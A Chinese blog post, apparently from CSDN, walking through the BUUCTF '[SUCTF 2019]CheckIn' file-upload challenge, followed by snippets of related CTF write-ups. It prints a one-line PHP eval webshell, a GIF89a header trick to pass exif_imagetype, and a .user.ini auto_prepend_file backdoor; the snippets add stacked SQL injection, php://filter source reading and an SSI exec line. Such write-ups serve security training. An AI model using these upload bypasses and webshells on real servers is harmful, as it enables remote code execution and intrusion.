buuctf-web-[SUCTF 2019]CheckIn-wp

最新推荐文章于 2022-09-09 18:26:14 发布
最新推荐文章于 2022-09-09 18:26:14 发布
阅读量346 收藏
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/119079132
版权

[SUCTF 2019]CheckIn

知识点

  • 图片马制作 copy 01.jpg/a + 02.php/b test.jpg

  • .user.ini的上传 GIF89a(如果需要的话) auto_prepend_file=test.jpg

过程

主页是一个上传页面

上传.php,提示非法后缀

尝试将.php后缀改成.jpg,提示过滤了<?

正常上传图片,上传成功

修改请求体中的一句话木马内容为

<script language="php">eval($_GET['cmd']);</script>

上传后,页面返回提示

搜罗资料

exif_imagetype
(PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8)

exif_imagetype — 判断一个图像的类型

说明
exif_imagetype ( string $filename ) : int

exif_imagetype() 读取一个图像的第一个字节并检查其签名。

这个函数就是检查文件头,直接制作图片马

成功上传,但是此时还无法执行PHP脚本,接着我们可以上传一个user.ini的文件(经过测试,没有过滤该后缀),我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell,关于该文件详见:https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html

然后我们去上传,文件名为.user.ini

GIF89a
auto_prepend_file=test.jpg

蚁剑连接即可

居上7788
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-Web-随便注-wp
single7_的博客
12-14 372
0x01 知识点 SQL注入-堆叠注入 sql预处理语句 巧用contact()函数绕过 0x02 知识铺垫 在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种注入方式称为堆叠注入。 union injection(联合注入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语
[SUCTF 2019]CheckIn -wp
freerats的博客
06-22 260
打开容器是一个很简陋的文件上传页面,习惯性的先传一个以jpg为后缀的一句话 发现无法上传<?,直接写的一句话肯定不行,这里可以使用\来代替<?php ?> 修改后再次提交,发现还是限制image,这个时候就需要添加图片头了,先试一下添加GIF89a,发现可以上传 发现不仅有我们上传的图片马,还有一个index.php 一开始产生的是上传.htaccess,把jpg解析为php,但这里没有成功。.htaccess的使用还是有限制的,首先服务器要是Apache,还要进行其他的配置 .htac
文件上传之黑名单验证绕过
weixin_34187822的博客
09-15 684
当做代码的审计或者文件搞渗文章上传的时候有时候会遇到黑名单的验证码,比如常规的一些脚本名asp php jsp这种的不允许上传,下面是我总结的一些绕过的方法Shtml<!--#includefile="/home/www/user8534/nav_foot.htm"--> //可以用来读文件<!--#exec cmd="ifconfig"--> //可...
BUUCTF WEB [SUCTF 2019]CheckIn
Y1da的博客
04-17 309
BUUCTF WEB [SUCTF 2019]CheckIn .user.ini文件 PHP 支持基于每个目录的 INI 文件配置。 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。 与php.ini不同,.user.ini是一个能被动态加载的ini文件,它实际上是一个可以由用户自定义
BUUCTF Web [SUCTF 2019]CheckIn1
最新发布
网安小趴菜
09-09 401
上传成功,访问一下.htaccess,神奇的是直接下载了一个index.htaccess文件,感觉是没戏了,抱着试一试的态度访问了一下图片马,果然,还是jpg无法解析。此时访问上传jpg文件是无法解析我们的php代码的,需要再上传个.htaccess文件(前面也要加上文件头)既然不能通过.htaccess的方法解析图片马,那就搜一下大佬的wp,发现他们都用了.user.ini方法。上传成功,但图片马好像没了,还需要再传一次,上传成功,先访问一下index.php,蚁剑连接。启动靶机,直接尝试传木马。
buuctf web 13、[SUCTF 2019]CheckIn
m0_46412682的博客
07-16 1082
buuctf web 13、[SUCTF 2019]CheckIn 开始的页面 1、 先上传一个正常的照片 2、再上传一个php文件,提示illegal suffix 3、上传一个只含一句话木马的后缀为gif的文件,提示内容中有<? 既然过滤了<? ,所以用 4、上传7.gif,但是提示不是gif类型,exif_imagetype是文件内容的头部看是否是对应的照片类型 我们只需要再文件中填写对应的照片头部 上传成功 5、但是要怎么样才能让照片木马执行,我们想到.htaccess
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 6151
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
[SUCTF 2019] web题-CheckIn
BROTHERYY的博客
07-07 532
复现环境:buuoj.cn 尝试了各种上传绕过的方法,但依然还是不行,看了下其他大佬的wp,茅塞顿开,也说明我太菜了。 写入保存将ctf.txt改为ctf.jpg auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件 auto_append_file 表示在php代码执行完毕后加载指定的php文件 自定义的.user,ini先执行auto_prepend_file函数,auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件,也就是先加
BUUCTF-WEB
ccfly1012的博客
11-02 3839
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF [SUCTF 2019]CheckIn
qq_42158602的博客
02-07 1598
拿到题进行简单的测试,发现修改content-type和利用特殊扩展名php5、pht等都没有成功 发现添加图片头文件就可以绕过 GIF89a 上传php文件的时候发现过滤了<? 绕过检测 <script language='php'></script> 构造图片马 GIF89a <script language='php'>eval($_GET['...
buuctf-web-[SUCTF 2019]CheckIn
weixin_43345082的博客
08-26 717
suctfweb签到题。。。。。。。。。。 当场没做出来 过滤了很多东西 首先后端是个黑名单,过滤了.php 之后试了各种截断发现都不行 然后想到传.htaccess 发现没用 之后发现不是apache是nginx的。。。 怪不得.htaccess没用 又去找nginx的漏洞 发现一个解析漏洞也没用 然后,我太难了 后来有师傅提示.user.ini 传送门1 传送门2 直接上马 .user.in...
buuctf-web-[ACTF2020 新生赛]Exec-wp
居上
06-25 189
[ACTF2020 新生赛]Exec 知识点 命令执行 过程 主页面: 这里是存在命令执行漏洞的,我们尝试去使用;执行命令 127.0.0.1;cat /flag
buuctf-web-[ACTF2020 新生赛]Include-wp
居上
06-22 178
[ACTF2020 新生赛]Include 知识点 php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode,用base64编码输出,不然会直接当做php代码执行,看不到源代码内容。 过程 主页: 有个get型的参数,可以看到传入flag.php,这里是一个文件包含,但是无法查看php脚本的详细内容 payload ?file=php://filter/read=convert.base64-encode/resource=flag.php .
BUUCTF web wp
vegetable223的博客
11-28 399
BUUCTF-web warmup wp 首先认真阅读题目,一般题目信息有提示,有些还会有隐藏信息 题目名是“warm up”,热身?,看来没什么用。下面有提示我们这一题的主要知识点是php和代码审计,淦!发现都没学过,不过不要紧,不会我们可以百度啊!!! 打开链接 看到一张滑稽的表情,肯定不简单,直接f12查看源代码 下面展示一些 内联代码片。 <!DOCTYPE html> <html lang="en"> <head> <meta charset=
buuctf-web-[ACTF2020 新生赛]BackupFile-wp
居上
07-17 227
[ACTF2020 新生赛]BackupFile 知识点 备份文件泄露 php中的弱类型比较 过程 使用扫描软件扫一下目录,扫到/index.php.bak <?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); } $key = intval($key);
buuctf web wp
qq_63267612的博客
04-10 518
文章目录[极客大挑战 2019]EasySQL [极客大挑战 2019]EasySQL 打开后是一个登录框,直接尝试万能密码 (用户名:1’ or 1=1 # 密码:随便输) 登录得到flag 这里的万能密码是为什么呢? 数据库中的查询语句: select id from users where username = '' or 1=1-- and password = '456' 又 这里呢1=1永远为真,后面 and password = '456’被注释掉了。数据库不需要考虑,这里我们就跳
buuctf-web-[极客大挑战 2019]Upload-wp
居上
07-12 228
[极客大挑战 2019]Upload 知识点 上传phtml文件 嵌在script标签中的一句话木马 content-type的修改 请求体中的添加文件头 过程 主页就是上传点,先上传一个正常的shell.php文件 发现只能上传image,bp抓包依次尝试文件后缀名修改,content-type修改、文件名%00截断,添加文件头都失败 然后更改文件名为xx.phtml,,phtml是嵌入了php代码的html文件,尝试上传,请求体中的内容仍然是普通的一句话木马文件 检测到<?请求体中的内
buuctf-web-[极客大挑战 2019]Knife-wp
居上
06-28 180
[极客大挑战 2019]Knife 知识点 蚁剑或者中国菜刀等工具的使用 过程 主页: 直接给出这个主页就是一句话木马 蚁剑连接,根目录查看到flag
C++中的虚函数与多态性解析
// 调用Student对象的checkin()函数 student_ptr->name; // 访问Student对象的name成员 ``` 然而,使用`new`分配的内存不会自动释放,需要使用`delete`操作符来显式地销毁对象并回收内存。如果不这样做,会导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值